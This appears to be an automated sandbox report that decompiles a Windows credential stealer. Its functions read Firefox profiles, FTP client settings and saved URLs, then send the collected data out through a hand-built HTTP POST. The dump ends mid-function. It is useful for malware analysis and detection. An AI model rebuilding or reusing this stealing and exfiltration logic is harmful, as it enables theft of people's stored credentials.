                                                                    				_v88 = 0;
                                                                    				_t89 = 0;
                                                                    				_v68 = E004018CF(0x1000);
                                                                    				_v76 = E004018CF(0x1000);
                                                                    				_v72 = E004018CF(0x1000);
                                                                    				memset( &_v64, 0, 0x3c << 0);
                                                                    				_v64 = 0x3c;
                                                                    				_push(_v68);
                                                                    				_pop( *_t9);
                                                                    				_push(_v76);
                                                                    				_pop( *_t11);
                                                                    				_v44 = 0xfff;
                                                                    				_v16 = 0xfff;
                                                                    				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
                                                                    				} else {
                                                                    					_v84 = 0xfff;
                                                                    					_t71 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
                                                                    					__eflags = _t71;
                                                                    					if(_t71 != 0) {
                                                                    						 *_v76 = 0;
                                                                    						memset( &_v64, 0, 0x3c << 0);
                                                                    						_v64 = 0x3c;
                                                                    						_push(_v76);
                                                                    						_pop( *_t26);
                                                                    						_v44 = 0xfff;
                                                                    						_v16 = 0xfff;
                                                                    						_t77 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
                                                                    						__eflags = _t77;
                                                                    						if(_t77 == 0) {
                                                                    							L7:
                                                                    							L18:
                                                                    							E004018B8(_v68);
                                                                    							E004018B8(_v72);
                                                                    							E004018B8(_v76);
                                                                    							if(_v88 != 0) {
                                                                    								E004018B8(_v88);
                                                                    							}
                                                                    							return _t89;
                                                                    						}
                                                                    						__eflags = _v48;
                                                                    						if(_v48 != 0) {
                                                                    							wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nContent-Length: %lu\r\nConnection: close\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n", _v76, _v68, _a12);
                                                                    							_t82 = E00403800(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff);
                                                                    							__eflags = _t82;
                                                                    							if(_t82 != 0) {
                                                                    								_v80 = _t82;
                                                                    								_t83 = E00403DB7(_v80);
                                                                    								_push(_v72);
                                                                    								L0041066A();
                                                                    								_t85 = E00403884(_v80, _v72, _t83);
                                                                    								__eflags = _t85;
                                                                    								if(_t85 != 0) {
                                                                    									__eflags = _a12;
                                                                    									if(_a12 == 0) {
                                                                    										L15:
                                                                    										_t89 = _t85;
                                                                    										__eflags = _t89;
                                                                    										if(__eflags != 0) {
                                                                    											_t89 = E00403A78(0, __eflags, _v80, _a16,  &_v88);
                                                                    										}
                                                                    										L17:
                                                                    										_push(_v80);
                                                                    										L00410844();
                                                                    										goto L18;
                                                                    									}
                                                                    									_t85 = E00403884(_v80, _a8, _a12);
                                                                    									__eflags = _t85;
                                                                    									if(_t85 != 0) {
                                                                    										goto L15;
                                                                    									}
                                                                    									goto L17;
                                                                    								}
                                                                    								goto L17;
                                                                    							}
                                                                    							goto L18;
                                                                    						}
                                                                    						goto L7;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
                                                                    • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
                                                                    • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
                                                                    • wsprintfA.USER32 ref: 00403EEE
                                                                      • Part of subcall function 00403DB7: 6FC113A0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403DDC
                                                                    • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
                                                                    • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403F64
                                                                    Strings
                                                                    • <, xrefs: 00403EA3
                                                                    • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$Crack$AllocC113CreateLocalclosesocketlstrlenwsprintf
                                                                    • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                                    • API String ID: 2045778469-2005047030
                                                                    • Opcode ID: df64ba05182c90d56540149d8834a888abe036e083c36425b861e4c09484dc02
                                                                    • Instruction ID: a429c4077cf35c25440d6dd763033275fbd814fdd036323c4685f88714ea5c3a
                                                                    • Opcode Fuzzy Hash: df64ba05182c90d56540149d8834a888abe036e083c36425b861e4c09484dc02
                                                                    • Instruction Fuzzy Hash: 4C41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10803AF510B52A1D7B95A55DB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 88%
                                                                    			E00409AC1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				CHAR* _v8;
                                                                    				CHAR* _v12;
                                                                    				intOrPtr _v16;
                                                                    				CHAR* _v20;
                                                                    				void* _t33;
                                                                    				void* _t35;
                                                                    				void* _t36;
                                                                    				intOrPtr _t38;
                                                                    				char* _t57;
                                                                    				char* _t61;
                                                                    				char* _t62;
                                                                    				CHAR* _t63;
                                                                    
                                                                    				_t33 = E00401F7E(_a8);
                                                                    				if(_t33 != 0) {
                                                                    					_t35 = E00401F7E(_a12);
                                                                    					if(_t35 != 0) {
                                                                    						_t36 = E004025A9(_a8);
                                                                    						_t37 = _t36;
                                                                    						if(_t36 != 0) {
                                                                    							_t38 = E00401DF8(_t37, _a8, 0);
                                                                    						} else {
                                                                    							_t38 = E00401DF8(_t37, _a8, "\\");
                                                                    						}
                                                                    						_v16 = _t38;
                                                                    						_v12 = E00401DF8(_t38, _v16, "profiles.ini");
                                                                    						_v8 = E004018CF(0xfdea);
                                                                    						_v20 = E004018CF(0x1000);
                                                                    						if(E00401F36(_v12) != 0 && GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12) > 2) {
                                                                    							_t63 = _v8;
                                                                    							if( *_t63 != 0) {
                                                                    								do {
                                                                    									if(StrStrIA(_t63, "Profile") != 0 && GetPrivateProfileStringA(_t63, "Path", 0x414847, _v20, 0xfff, _v12) != 0) {
                                                                    										if(GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12) != 1) {
                                                                    											E00409AA9(_a4, _v20, _a12);
                                                                    										} else {
                                                                    											_t57 = E00401DF8(_t55, _v16, _v20);
                                                                    											_push(_t57);
                                                                    											_t61 = _t57;
                                                                    											while(1) {
                                                                    												_t62 = _t61;
                                                                    												if(_t62 == 0 ||  *_t62 == 0) {
                                                                    													break;
                                                                    												}
                                                                    												if( *_t62 == 0x2f) {
                                                                    													 *_t62 = 0x5c;
                                                                    												}
                                                                    												_t61 = _t62 + 1;
                                                                    											}
                                                                    											E00409AA9(_a4, _t57, _a12);
                                                                    											E004018B8();
                                                                    										}
                                                                    									}
                                                                    									asm("cld");
                                                                    									asm("repne scasb");
                                                                    								} while ( *_t63 != 0);
                                                                    							}
                                                                    						}
                                                                    						E004018B8(_v16);
                                                                    						E004018B8(_v20);
                                                                    						E004018B8(_v12);
                                                                    						E004018B8(_v8);
                                                                    						return E00409AA9(_a4, _a8, _a12);
                                                                    					} else {
                                                                    						return _t35;
                                                                    					}
                                                                    				} else {
                                                                    					return _t33;
                                                                    				}
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: IsRelative$Path$Profile$profiles.ini
                                                                    • API String ID: 0-4107377610
                                                                    • Opcode ID: 05242174d740a931ff5bd0c49c4950aace28accfb88bdea9936157d2b129aa80
                                                                    • Instruction ID: 5ee8cadbbd8b00acdf57b7c0c8cba141a4701fb156d17687039a110dfaec4fae
                                                                    • Opcode Fuzzy Hash: 05242174d740a931ff5bd0c49c4950aace28accfb88bdea9936157d2b129aa80
                                                                    • Instruction Fuzzy Hash: 97412C31A40146BADF227BA1DC02EAE7F72AF51314F14457BB510741E2DBBE9E90AB09
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E0040446A() {
                                                                    				char _v8;
                                                                    				struct HINSTANCE__* _t4;
                                                                    				intOrPtr* _t10;
                                                                    				struct HINSTANCE__* _t15;
                                                                    
                                                                    				_t4 = GetModuleHandleA("kernel32.dll");
                                                                    				_t15 = _t4;
                                                                    				_v8 = 0;
                                                                    				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
                                                                    					L5:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t10 = GetProcAddress(_t15, "IsWow64Process");
                                                                    					if(_t10 == 0) {
                                                                    						goto L5;
                                                                    					} else {
                                                                    						 *_t10(GetCurrentProcess(),  &_v8);
                                                                    						if(_v8 == 0) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							return 1;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$CurrentHandleModuleProcess
                                                                    • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                    • API String ID: 977827838-3073145729
                                                                    • Opcode ID: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                                                    • Instruction ID: b4fabcce51f297447bc7e22879592c7cf0400204f4cc9062f02e0cb4fe293c57
                                                                    • Opcode Fuzzy Hash: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                                                    • Instruction Fuzzy Hash: C4F0547271020466C710B2B96C45BDF269887C03A6F290A37F105F22C1E9FCDD858278
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E0040D854(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v20;
                                                                    				char* _v24;
                                                                    				char* _v28;
                                                                    				char* _v32;
                                                                    				char _v33;
                                                                    				char* _v40;
                                                                    				char* _v44;
                                                                    				char _v45;
                                                                    				void* _t28;
                                                                    				intOrPtr* _t31;
                                                                    				intOrPtr* _t35;
                                                                    				void* _t37;
                                                                    				intOrPtr* _t39;
                                                                    				void* _t41;
                                                                    				void* _t50;
                                                                    				char* _t55;
                                                                    				char* _t57;
                                                                    
                                                                    				_t50 = __ecx;
                                                                    				_t28 = E00401F36(_a8);
                                                                    				if(_t28 != 0) {
                                                                    					_t31 = E00401FFD(__eflags, _a8,  &_v20);
                                                                    					__eflags = _t31;
                                                                    					if(_t31 != 0) {
                                                                    						_v24 = E004018CF(_v8);
                                                                    						E00401906(_v12, _v24, _v8);
                                                                    						_t55 = _v24;
                                                                    						while(1) {
                                                                    							__eflags =  *_t55;
                                                                    							if( *_t55 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t35 = StrStrA(_t55, "<setting name=\"");
                                                                    							__eflags = _t35;
                                                                    							if(_t35 != 0) {
                                                                    								_push("<setting name=\"");
                                                                    								L0041066A();
                                                                    								_t57 = _t35 + _t35;
                                                                    								_v28 = _t57;
                                                                    								_t37 = StrStrA(_t57, 0x4168f6);
                                                                    								__eflags = _t37;
                                                                    								if(_t37 != 0) {
                                                                    									_v33 =  *_t37;
                                                                    									_v32 = _t37;
                                                                    									_t39 = StrStrA(_t57, "value=\"");
                                                                    									__eflags = _t39;
                                                                    									if(_t39 != 0) {
                                                                    										_push("value=\"");
                                                                    										L0041066A();
                                                                    										_t55 = _t39 + _t39;
                                                                    										_v40 = _t55;
                                                                    										_t41 = StrStrA(_t55, 0x4168f6);
                                                                    										__eflags = _t41;
                                                                    										if(_t41 != 0) {
                                                                    											_v45 =  *_t41;
                                                                    											_v44 = _t41;
                                                                    											 *_v32 = 0;
                                                                    											 *_v44 = 0;
                                                                    											E0040D7C7(_v44, _t50, _a4, _v28, _v40);
                                                                    											 *_v32 = _v33;
                                                                    											 *_v44 = _v45;
                                                                    											continue;
                                                                    										}
                                                                    										break;
                                                                    									}
                                                                    									break;
                                                                    								}
                                                                    								break;
                                                                    							}
                                                                    							break;
                                                                    						}
                                                                    						E004018B8(_v24);
                                                                    						return E00402091( &_v20);
                                                                    					}
                                                                    					return _t31;
                                                                    				} else {
                                                                    					return _t28;
                                                                    				}
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <setting name="$value="
                                                                    • API String ID: 0-3468128162
                                                                    • Opcode ID: 7c10b0ec1435bdbb9c2c95abbcad16e27b179bf6e7f3ca8f0351648c8ba48894
                                                                    • Instruction ID: 73fa1e58b4d6e0f5acaca6cd35f95d233c17529f6f8bb818b449ef047748446b
                                                                    • Opcode Fuzzy Hash: 7c10b0ec1435bdbb9c2c95abbcad16e27b179bf6e7f3ca8f0351648c8ba48894
                                                                    • Instruction Fuzzy Hash: B0319272D0425A9ECF11BBE58C419EEBFB19F15318F1440B7E450B2291D6B84A84D7A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 70%
                                                                    			E00401FFD(void* __eflags, int _a4, void** _a8) {
                                                                    				void* _t10;
                                                                    				void* _t11;
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				void** _t22;
                                                                    
                                                                    				_t22 = _a8;
                                                                    				_t10 = E004018E6(_t22, 0x10);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(3);
                                                                    				_push(0);
                                                                    				_push(3);
                                                                    				_push(0x80000000);
                                                                    				ExitProcess(_a4);
                                                                    				 *_t22 = _t10;
                                                                    				_t11 = _t10 + 1;
                                                                    				if(_t11 != 0) {
                                                                    					_t22[3] = GetFileSize(_t11, 0);
                                                                    					_t16 = CreateFileMappingA( *_t22, 0, 2, 0, 0, 0);
                                                                    					if(_t16 == 0) {
                                                                    						CloseHandle( *_t22);
                                                                    						 *_t22 = 0xffffffff;
                                                                    					} else {
                                                                    						_t22[1] = _t16;
                                                                    						_t18 = MapViewOfFile(_t16, 4, 0, 0, 0);
                                                                    						_t22[2] = _t18;
                                                                    						if(_t18 == 0) {
                                                                    							CloseHandle(_t22[1]);
                                                                    							CloseHandle( *_t22);
                                                                    							 *_t22 = 0xffffffff;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return 0 | _t22[2] != 0x00000000;
                                                                    			}

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040201E
                                                                    • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040202B
                                                                    • CreateFileMappingA.KERNEL32 ref: 0040203F
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003), ref: 00402054
                                                                    • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?,80000000), ref: 00402063
                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?), ref: 0040206A
                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402079
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                                                                    • String ID:
                                                                    • API String ID: 3150701006-0
                                                                    • Opcode ID: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                                                                    • Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
                                                                    • Opcode Fuzzy Hash: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                                                                    • Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E004086D8(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				char* _v12;
                                                                    				intOrPtr _v16;
                                                                    				char* _v20;
                                                                    				char* _v24;
                                                                    				char* _v28;
                                                                    				intOrPtr _v32;
                                                                    				void* _t80;
                                                                    				char* _t87;
                                                                    				void* _t101;
                                                                    				char* _t112;
                                                                    				char* _t139;
                                                                    				char* _t140;
                                                                    
                                                                    				_t137 = __ecx;
                                                                    				_t136 = __ebx;
                                                                    				_v16 = E00401082(_t80, __edi, __eflags, _a4);
                                                                    				if(_v16 >= 0x10) {
                                                                    					_push(_a4);
                                                                    					E004012BB(_t81, __eflags);
                                                                    					_v12 = 1;
                                                                    					_v8 = E00401364(__eflags, _a4,  &_v12);
                                                                    					__eflags = _v12;
                                                                    					if(_v12 == 0) {
                                                                    						L5:
                                                                    						return 1;
                                                                    					} else {
                                                                    						__eflags = _v8 - 2;
                                                                    						if(_v8 < 2) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							__eflags = _v8 - 6;
                                                                    							if(__eflags <= 0) {
                                                                    								_t87 = E00401364(__eflags, _a4,  &_v12);
                                                                    								__eflags = _v12;
                                                                    								if(_v12 == 0) {
                                                                    									L8:
                                                                    									return 1;
                                                                    								} else {
                                                                    									__eflags = _t87;
                                                                    									if(_t87 == 0) {
                                                                    										__eflags = _v8 - 5;
                                                                    										if(__eflags < 0) {
                                                                    											_v32 = E00401364(__eflags, _a4,  &_v12);
                                                                    											E004013E8( &_v12, __ebx, __ecx, _a4, 4,  &_v12);
                                                                    										} else {
                                                                    											E004013E8( &_v12, __ebx, __ecx, _a4, 0x18,  &_v12);
                                                                    											_v32 = E00401364(__eflags, _a4,  &_v12);
                                                                    										}
                                                                    										E00408275(_t136, _t137, _a4,  &_v12);
                                                                    										__eflags = _v32 - 1;
                                                                    										if(__eflags == 0) {
                                                                    											E00408568(_t136, _t137, __eflags, _a4, _a8, _v8,  &_v12);
                                                                    											E00408275(_t136, _t137, _a4,  &_v12);
                                                                    										}
                                                                    										__eflags = _v12;
                                                                    										if(__eflags != 0) {
                                                                    											E00408568(_t136, _t137, __eflags, _a4, _a8, _v8,  &_v12);
                                                                    											__eflags = _v12;
                                                                    											if(__eflags != 0) {
                                                                    												_t139 = E00401364(__eflags, _a4,  &_v12);
                                                                    												while(1) {
                                                                    													__eflags = _v12;
                                                                    													if(_v12 == 0) {
                                                                    														break;
                                                                    													}
                                                                    													_t140 = _t139;
                                                                    													__eflags = _t140;
                                                                    													if(_t140 != 0) {
                                                                    														_t101 = E00401522(_a4);
                                                                    														__eflags = _t101 - _v16;
                                                                    														if(_t101 != _v16) {
                                                                    															__eflags = _v8 - 6;
                                                                    															if(__eflags >= 0) {
                                                                    																E00401364(__eflags, _a4,  &_v12);
                                                                    																E00408275(_t136, _t137, _a4,  &_v12);
                                                                    																E00408275(_t136, _t137, _a4,  &_v12);
                                                                    															}
                                                                    															_v20 = E00408426(_t137, __eflags, _a4,  &_v12);
                                                                    															_v24 = E00408426(_t137, __eflags, _a4,  &_v12);
                                                                    															_v28 = E00408426(_t137, __eflags, _a4,  &_v12);
                                                                    															__eflags = _v20;
                                                                    															if(_v20 != 0) {
                                                                    																__eflags = _v24;
                                                                    																if(_v24 != 0) {
                                                                    																	__eflags = _v28;
                                                                    																	if(_v28 != 0) {
                                                                    																		__eflags = _v12;
                                                                    																		if(_v12 != 0) {
                                                                    																			_t112 = StrStrIA(_v20, "ftp://");
                                                                    																			__eflags = _t112;
                                                                    																			if(_t112 == 0) {
                                                                    																				_t112 = StrStrIA(_v20, "http://");
                                                                    																				__eflags = _t112;
                                                                    																				if(_t112 == 0) {
                                                                    																					_t112 = StrStrIA(_v20, "https://");
                                                                    																				}
                                                                    																			}
                                                                    																			__eflags = _t112;
                                                                    																			if(_t112 != 0) {
                                                                    																				E004015CB(E004015CB(E004015CB(E00401569(_a8, 0xbeef0000), _a8, _v20), _a8, _v24), _a8, _v28);
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    															E004018B8(_v20);
                                                                    															E004018B8(_v24);
                                                                    															E004018B8(_v28);
                                                                    															_t139 = _t140 - 1;
                                                                    															__eflags = _t139;
                                                                    															continue;
                                                                    														} else {
                                                                    														}
                                                                    													}
                                                                    													break;
                                                                    												}
                                                                    												return _v12;
                                                                    											} else {
                                                                    												return 0;
                                                                    											}
                                                                    										} else {
                                                                    											return 0;
                                                                    										}
                                                                    									} else {
                                                                    										goto L8;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								goto L5;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}
                                                                    Instruction addresses for the decompiled lines above (layout column spilled during extraction; range 0x004086d8 to 0x00408919)

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ftp://$http://$https://
                                                                    • API String ID: 0-2804853444
                                                                    • Opcode ID: a861b8ddab3cd7e1c19046bbce272ce323264d9726407a7c299481b982024a59
                                                                    • Instruction ID: 81f334c42a3cb0fc056165a4037353c858dea4867f82d2d186d61bdc58b91dcb
                                                                    • Opcode Fuzzy Hash: a861b8ddab3cd7e1c19046bbce272ce323264d9726407a7c299481b982024a59
                                                                    • Instruction Fuzzy Hash: 2E61F872800109FEDF11AF91CD45AEEBBB9EB04348F10807BB841B51A1DB798B95DB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E0040E0FE(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v20;
                                                                    				char* _v24;
                                                                    				char* _v28;
                                                                    				unsigned int _v32;
                                                                    				intOrPtr _v36;
                                                                    				void* _t35;
                                                                    				unsigned int _t38;
                                                                    				unsigned int _t42;
                                                                    				unsigned int _t44;
                                                                    				unsigned int _t45;
                                                                    				char* _t46;
                                                                    				unsigned int _t53;
                                                                    				unsigned int _t57;
                                                                    				char _t64;
                                                                    				char* _t65;
                                                                    
                                                                    				_t35 = E00401F36(_a8);
                                                                    				if(_t35 != 0) {
                                                                    					_t38 = E00401FFD(__eflags, _a8,  &_v20);
                                                                    					__eflags = _t38;
                                                                    					if(_t38 != 0) {
                                                                    						_v24 = E004018CF(_v8);
                                                                    						E00401906(_v12, _v24, _v8);
                                                                    						_t65 = _v24;
                                                                    						while(1) {
                                                                    							__eflags =  *_t65;
                                                                    							if( *_t65 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t42 = StrStrA(_t65, "winex=\"");
                                                                    							__eflags = _t42;
                                                                    							if(_t42 != 0) {
                                                                    								_push("winex=\"");
                                                                    								L0041066A();
                                                                    								_t65 = _t42 + _t42;
                                                                    								_v28 = _t65;
                                                                    								_t44 = StrStrA(_t65, "\"/>");
                                                                    								__eflags = _t44;
                                                                    								if(_t44 != 0) {
                                                                    									 *_t44 = 0;
                                                                    									_push(_t44);
                                                                    									_push( *_t44);
                                                                    									_push(_v28);
                                                                    									L0041066A();
                                                                    									_t45 = _t44;
                                                                    									__eflags = _t45;
                                                                    									if(_t45 != 0) {
                                                                    										_v32 = _t45;
                                                                    										_v36 = E00402A1D(_t45, _v28);
                                                                    										_t53 = E00402B0D(_v36, _v32);
                                                                    										__eflags = _t53;
                                                                    										if(_t53 != 0) {
                                                                    											_v32 = _v32 >> 1;
                                                                    											_t57 = E004043DC(_v36,  &_v32, 0);
                                                                    											__eflags = _t57;
                                                                    											if(_t57 != 0) {
                                                                    												E004015CB(E00401569(_a4, 0xbeef0001), _a4, _v28);
                                                                    												E0040159F(_a4, _v36, _v32);
                                                                    											}
                                                                    										}
                                                                    										E004018B8(_v36);
                                                                    									}
                                                                    									_pop(_t64);
                                                                    									_pop(_t46);
                                                                    									 *_t46 = _t64;
                                                                    									continue;
                                                                    								}
                                                                    								break;
                                                                    							}
                                                                    							break;
                                                                    						}
                                                                    						E00401569(_a4, 0xbeef0002);
                                                                    						E0040159F(_a4, _v24, _v8);
                                                                    						E004018B8(_v24);
                                                                    						return E00402091( &_v20);
                                                                    					}
                                                                    					return _t38;
                                                                    				} else {
                                                                    					return _t35;
                                                                    				}
                                                                    			}
                                                                    Instruction addresses for the decompiled lines above (layout column spilled during extraction; range 0x0040e10d to 0x0040e234)

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "/>$winex="
                                                                    • API String ID: 0-1498080979
                                                                    • Opcode ID: b09a3e927d382e949d7f6434c3017a05fa90477b36eee91e9710b39a97fa2ba0
                                                                    • Instruction ID: a65735a88df2e3c906ae4414ece12a79dd6024024b2867e7669953596bd514cb
                                                                    • Opcode Fuzzy Hash: b09a3e927d382e949d7f6434c3017a05fa90477b36eee91e9710b39a97fa2ba0
                                                                    • Instruction Fuzzy Hash: 43313E3290401ABEDF12ABA2CC02DEE7E76AF44344F10483BF501B51F1D7798A61EB99
                                                                    Uniqueness
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E0040816D(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				char* _t9;
                                                                    				void* _t16;
                                                                    				void* _t17;
                                                                    				void* _t18;
                                                                    				char* _t20;
                                                                    				char* _t21;
                                                                    
                                                                    				_t17 = __ecx;
                                                                    				_t16 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x20, 0);
                                                                    				_t21 =  *0x4147ed; // 0x640b38
                                                                    				_t20 =  *0x4147f1; // 0x645e80
                                                                    				if( *_t20 != 0) {
                                                                    					do {
                                                                    						_push(StrStrIA(_t21, "FTPCON"));
                                                                    						_t9 = StrStrIA(_t20, "FTP CONTROL");
                                                                    						_pop(_t18);
                                                                    						if(_t9 != 0) {
                                                                    							L3:
